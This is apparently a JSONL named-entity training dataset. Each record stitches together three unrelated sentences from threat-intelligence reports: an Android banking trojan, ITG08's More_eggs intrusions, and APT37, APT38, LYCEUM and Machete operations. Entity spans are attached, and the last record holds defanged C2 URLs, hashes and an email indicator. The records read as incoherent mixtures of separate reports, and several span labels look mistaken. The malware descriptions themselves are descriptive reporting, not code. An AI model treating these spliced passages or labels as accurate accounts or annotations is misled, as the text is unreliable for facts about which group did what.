{"text": "The second timer will run every five seconds and it will try to enable the WiFi if it 's disabled . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": [{"start": 100, "end": 115, "label": "Organization"}, {"start": 143, "end": 156, "label": "Organization"}, {"start": 235, "end": 244, "label": "System"}, {"start": 280, "end": 285, "label": "Malware"}, {"start": 286, "end": 293, "label": "Malware"}]}
{"text": "The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device 's status . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 175, "end": 179, "label": "Organization"}, {"start": 255, "end": 260, "label": "System"}, {"start": 394, "end": 403, "label": "Organization"}]}
{"text": "During the trojan registration stage , the trojan exfiltrates private information such as the phone 's model , IMEI , phone number and country . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": [{"start": 159, "end": 166, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Organization"}]}
{"text": "It will also report the version of Android that the phone is running and any additional capabilities . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": [{"start": 35, "end": 42, "label": "System"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 249, "end": 253, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}]}
{"text": "Device registration This is the last of the three main timers that are created . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites \u2014 a technique known as online skimming \u2014 thereby stealing payment card data transmitted to the vendor by unsuspecting customers . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 97, "end": 102, "label": "Organization"}, {"start": 131, "end": 154, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}, {"start": 450, "end": 462, "label": "Organization"}, {"start": 483, "end": 500, "label": "Organization"}]}
{"text": "The trojan will register the SMS handler , which will forward the contents and the sender of all of the SMS messages on the phone to the C2 . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": [{"start": 172, "end": 177, "label": "Organization"}, {"start": 400, "end": 405, "label": "Organization"}]}
{"text": "The final step in the trojan 's initialization is the escalation and maintenance of privileges in the device . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 111, "end": 116, "label": "Organization"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 279, "end": 297, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}]}
{"text": "This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device 's settings . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": [{"start": 161, "end": 166, "label": "Organization"}, {"start": 177, "end": 195, "label": "System"}, {"start": 367, "end": 376, "label": "Organization"}]}
{"text": "Privilege escalation requests The screens asking for the user 's approval wo n't close unless the user approves the privilege escalation . Attackers use it to create , expand and cement their foothold in compromised environments . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": [{"start": 139, "end": 148, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}]}
{"text": "If the user closes the windows , they will appear again due to the timer configuration . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 109, "end": 141, "label": "System"}, {"start": 252, "end": 261, "label": "Organization"}]}
{"text": "After the installation of the trojan , it will wait randomly between three and five minutes to activate one of the native capabilities \u2014 these are implemented on the eClient subclass called \" GoogleCC . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": [{"start": 231, "end": 238, "label": "Organization"}, {"start": 394, "end": 412, "label": "Malware"}, {"start": 467, "end": 472, "label": "Organization"}]}
{"text": "'' This class will open a WebView with a Google-themed page asking for payment in order to use the Google services . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": [{"start": 41, "end": 54, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}, {"start": 148, "end": 165, "label": "Malware"}, {"start": 178, "end": 186, "label": "Malware"}, {"start": 191, "end": 209, "label": "Malware"}, {"start": 249, "end": 256, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 303, "end": 309, "label": "Malware"}, {"start": 375, "end": 384, "label": "Organization"}]}
{"text": "This will take the user through several steps until it collects all the necessary credit card information , which will be checked online and exfiltrated to the C2 . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": [{"start": 165, "end": 177, "label": "Organization"}, {"start": 198, "end": 216, "label": "Malware"}, {"start": 444, "end": 452, "label": "Organization"}]}
{"text": "During this process , an amount of money , configured by the malicious operator , is requested to the user . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 178, "end": 181, "label": "System"}, {"start": 186, "end": 196, "label": "System"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 395, "end": 401, "label": "Malware"}]}
{"text": "Steps to request the user 's credit card information In our sample configuration , the request for the views above can not be canceled or removed from the screen \u2014 behaving just like a screen lock that wo n't be disabled without providing credit card information . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates .", "spans": [{"start": 269, "end": 278, "label": "Organization"}, {"start": 430, "end": 438, "label": "Organization"}, {"start": 511, "end": 517, "label": "Malware"}]}
{"text": "All communication with the C2 is done over HTTP . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": [{"start": 69, "end": 78, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 166, "end": 174, "label": "System"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 261, "end": 273, "label": "Malware"}, {"start": 338, "end": 344, "label": "Malware"}]}
{"text": "It will use either a standard web request or it will write data into a web socket if the first method fails . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . However , we asses with medium confidence that NavRAT is linked to Group123 .", "spans": [{"start": 143, "end": 148, "label": "Organization"}, {"start": 172, "end": 198, "label": "System"}, {"start": 248, "end": 254, "label": "Malware"}, {"start": 268, "end": 276, "label": "Organization"}]}
{"text": "The C2 can also use WebSocket as a backup communication channel . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": [{"start": 66, "end": 74, "label": "Malware"}, {"start": 128, "end": 147, "label": "Malware"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 292, "end": 314, "label": "Organization"}, {"start": 357, "end": 369, "label": "Organization"}]}
{"text": "Before sending any data to the C2 using the trojan attempts to disguise its data , the data is serialized using JSON , which is then encoded in Base64 . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": [{"start": 255, "end": 260, "label": "Organization"}, {"start": 283, "end": 309, "label": "System"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 492, "end": 514, "label": "Organization"}]}
{"text": "However , the trojan replaces the '= ' by 'AAAZZZXXX ' , the '+ ' by '| ' and the '/ ' by ' . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": [{"start": 107, "end": 116, "label": "System"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 166, "end": 190, "label": "System"}, {"start": 195, "end": 213, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 391, "end": 413, "label": "Organization"}]}
{"text": "' to disguise the Base64 . After injecting Meterpreter into memory , the attacker had complete control of the infected device . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": [{"start": 73, "end": 81, "label": "Organization"}]}
{"text": "Request encoding process The HTTP requests follow the format below , while on the WebSocket only the query data is written . IBM X-Force IRIS has gained insight into ITG08\u2019s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": [{"start": 125, "end": 141, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 256, "end": 261, "label": "System"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 364, "end": 375, "label": "Organization"}, {"start": 437, "end": 442, "label": "Organization"}]}
{"text": "? After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 82, "end": 100, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 237, "end": 253, "label": "Organization"}]}
{"text": "q= - : As is common with trojans , the communication is always initiated by the trojan on the device to the C2 . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08\u2019s use of PowerShell to conduct malicious activity . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": [{"start": 223, "end": 230, "label": "Organization"}, {"start": 238, "end": 248, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 343, "end": 368, "label": "Organization"}, {"start": 439, "end": 461, "label": "Organization"}]}
{"text": "The request codes are actually replies to the C2 action requests , which are actually called \" responses . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": [{"start": 111, "end": 117, "label": "Organization"}, {"start": 167, "end": 196, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 234, "end": 252, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]}
{"text": "'' There are 27 response codes that the C2 can use to make requests to the trojan , which pretty much match what 's listed in the capabilities section . CTU research indicates that LYCEUM may have been active as early as April 2018 . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": [{"start": 153, "end": 156, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}, {"start": 409, "end": 427, "label": "Organization"}]}
{"text": "Error Registration Ok Empty SendSMS RequestGoogleCC Wipe OpenBrowser SendUSSD RequestSMSList RequestAppList RequestLocation ShowNotification SetLockPassword LockNow MuteSound LoadScript LoadPlugin ServerChange StartApp CallPhone SetPingTimer SMSBroadcast RequestContacts AddInject RemoveInject Evaluate Another feature of this trojan is the ability to register injects , which are JavaScript snippets of code . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": [{"start": 436, "end": 441, "label": "Organization"}, {"start": 560, "end": 565, "label": "Organization"}, {"start": 598, "end": 620, "label": "Organization"}]}
{"text": "These will be executed in a WebView object created by the trojan . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": [{"start": 235, "end": 240, "label": "Organization"}, {"start": 301, "end": 323, "label": "Organization"}]}
{"text": "This gives the operators the capability to trick the user into accessing any site while stealing the user 's cookies or forging form fields , like account numbers or phone numbers . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": [{"start": 261, "end": 273, "label": "Organization"}, {"start": 295, "end": 301, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 328, "end": 342, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 367, "end": 372, "label": "Organization"}, {"start": 375, "end": 380, "label": "Organization"}, {"start": 427, "end": 432, "label": "Organization"}, {"start": 437, "end": 455, "label": "Organization"}]}
{"text": "Trojan activity At the time of the writing of this post , all URLs ( see IOC section ) found on the sample were inactive , and it does not seem to be widespread . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": [{"start": 168, "end": 171, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 370, "end": 389, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}]}
{"text": "There are some indicators that this sample is just a test sample on its final stages of development . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 256, "end": 276, "label": "System"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 298, "end": 310, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 438, "end": 460, "label": "Organization"}]}
{"text": "There are several strings and labels still mentioning 'test ' or 'testcc ' \u2014 even the URL used for the credit card data exfiltration is named \" testcc.php . The developer consistently used Accept-Enconding\u201d (note the extra \u2018n\u2019) in all DanBot samples analyzed by CTU researchers . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": [{"start": 144, "end": 154, "label": "Indicator"}, {"start": 235, "end": 241, "label": "Malware"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 280, "end": 285, "label": "Organization"}, {"start": 300, "end": 340, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}]}
{"text": "'' Debug information on logcat Another indicator is the amount of debugging information the trojan is still generating \u2014 a production-level trojan would keep its logging to a minimum . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": [{"start": 185, "end": 198, "label": "System"}, {"start": 204, "end": 221, "label": "System"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 540, "end": 551, "label": "Organization"}, {"start": 602, "end": 607, "label": "Organization"}]}
{"text": "The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": [{"start": 139, "end": 145, "label": "Organization"}, {"start": 169, "end": 175, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 329, "end": 351, "label": "Organization"}, {"start": 387, "end": 392, "label": "Malware"}]}
{"text": "We have observed this trojan being submitted to public antivirus testing platforms , once as a package and once for each DLL to determine the detection ratio . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": [{"start": 160, "end": 166, "label": "Organization"}, {"start": 187, "end": 194, "label": "System"}]}
{"text": "The sample analyzed was targeted at Russian-speaking users , as most of the user interaction pages are written in Russian . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": [{"start": 159, "end": 167, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 209, "end": 221, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}]}
{"text": "However , given the way the trojan is built , it is highly customizable , meaning that adapting it to a different language would be extremely easy . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": [{"start": 189, "end": 195, "label": "System"}, {"start": 220, "end": 223, "label": "Organization"}, {"start": 227, "end": 235, "label": "Organization"}, {"start": 238, "end": 244, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 405, "end": 427, "label": "Organization"}]}
{"text": "The wide range of capabilities does n't limit this trojan to a specific malicious activity like a banking trojan or a ransomware . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": [{"start": 141, "end": 144, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 349, "end": 373, "label": "Organization"}, {"start": 384, "end": 407, "label": "Organization"}, {"start": 465, "end": 484, "label": "Organization"}, {"start": 505, "end": 521, "label": "Organization"}]}
{"text": "This makes it impossible to create a target profile . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": [{"start": 54, "end": 60, "label": "Organization"}, {"start": 86, "end": 106, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 378, "end": 400, "label": "Organization"}, {"start": 411, "end": 422, "label": "Organization"}]}
{"text": "Conclusion This trojan shows a new path for threats to evolve . Aside from deploying novel malware , LYCEUM\u2019s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": [{"start": 101, "end": 109, "label": "Organization"}, {"start": 145, "end": 148, "label": "Organization"}, {"start": 249, "end": 260, "label": "Organization"}]}
{"text": "Having the ability to move code from desktops to mobile platforms with no effort , like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 .", "spans": [{"start": 92, "end": 103, "label": "Indicator"}, {"start": 369, "end": 375, "label": "Organization"}, {"start": 612, "end": 621, "label": "Organization"}, {"start": 693, "end": 698, "label": "Organization"}]}
{"text": "This trojan 's design and implementation is of an uncommonly high level , making it a dangerous threat . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 206, "end": 219, "label": "Organization"}, {"start": 222, "end": 227, "label": "Organization"}]}
{"text": "These kinds of threats will become more common , as more and more companies decide to publish their software directly to consumers . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 233, "end": 240, "label": "System"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}]}
{"text": "There have been several recent examples of companies choosing to release their software directly to consumers , bypassing traditional storefronts . ESET has been tracking a new version of Machete (the group\u2019s Python-based toolset) that was first seen in April 2018 . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": [{"start": 148, "end": 152, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 346, "end": 363, "label": "Organization"}]}
{"text": "The average user might not have the necessary skills to distinguish legitimate sites from malicious ones . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": [{"start": 167, "end": 186, "label": "Organization"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 319, "end": 341, "label": "Organization"}]}
{"text": "We 've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms , so , unfortunately , it does n't seem that this will change any time soon . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": [{"start": 195, "end": 200, "label": "Organization"}, {"start": 395, "end": 417, "label": "Organization"}, {"start": 468, "end": 473, "label": "Organization"}, {"start": 535, "end": 540, "label": "Organization"}]}
{"text": "And this just means attackers will continue to be successful . Machete is interested in files that describe navigation routes and positioning using military grids . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": [{"start": 63, "end": 70, "label": "Organization"}, {"start": 99, "end": 125, "label": "Organization"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 200, "end": 207, "label": "Malware"}, {"start": 227, "end": 234, "label": "Malware"}, {"start": 239, "end": 248, "label": "Malware"}, {"start": 338, "end": 342, "label": "Organization"}]}
{"text": "Coverage Additional ways our customers can detect and block this threat are listed below . The Machete group sends very specific emails directly to its victims , and these change from target to target . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": [{"start": 95, "end": 102, "label": "Organization"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 238, "end": 245, "label": "Malware"}, {"start": 265, "end": 272, "label": "Malware"}, {"start": 277, "end": 286, "label": "Malware"}, {"start": 376, "end": 380, "label": "Organization"}]}
{"text": "Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": [{"start": 0, "end": 35, "label": "System"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 366, "end": 371, "label": "Organization"}]}
{"text": "Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 0, "end": 32, "label": "System"}, {"start": 36, "end": 66, "label": "System"}, {"start": 162, "end": 179, "label": "Malware"}, {"start": 198, "end": 207, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 276, "end": 297, "label": "Indicator"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 377, "end": 382, "label": "Organization"}]}
{"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}]}
{"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": [{"start": 36, "end": 69, "label": "System"}, {"start": 72, "end": 125, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 206, "end": 222, "label": "Malware"}, {"start": 252, "end": 265, "label": "Malware"}, {"start": 341, "end": 352, "label": "Organization"}, {"start": 363, "end": 372, "label": "Malware"}, {"start": 399, "end": 404, "label": "Organization"}, {"start": 429, "end": 433, "label": "Organization"}]}
{"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 106, "end": 110, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}, {"start": 228, "end": 235, "label": "Malware"}, {"start": 394, "end": 398, "label": "Organization"}]}
{"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 206, "end": 219, "label": "Malware"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 324, "end": 329, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 440, "end": 454, "label": "Organization"}]}
{"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": [{"start": 276, "end": 283, "label": "Organization"}, {"start": 360, "end": 362, "label": "Organization"}, {"start": 403, "end": 408, "label": "Organization"}, {"start": 525, "end": 532, "label": "Organization"}]}
{"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": [{"start": 38, "end": 62, "label": "Indicator"}, {"start": 63, "end": 100, "label": "Indicator"}, {"start": 101, "end": 137, "label": "Indicator"}, {"start": 150, "end": 161, "label": "Indicator"}, {"start": 164, "end": 228, "label": "Indicator"}, {"start": 229, "end": 239, "label": "Indicator"}, {"start": 242, "end": 306, "label": "Indicator"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 467, "end": 472, "label": "Organization"}, {"start": 497, "end": 501, "label": "Organization"}]}
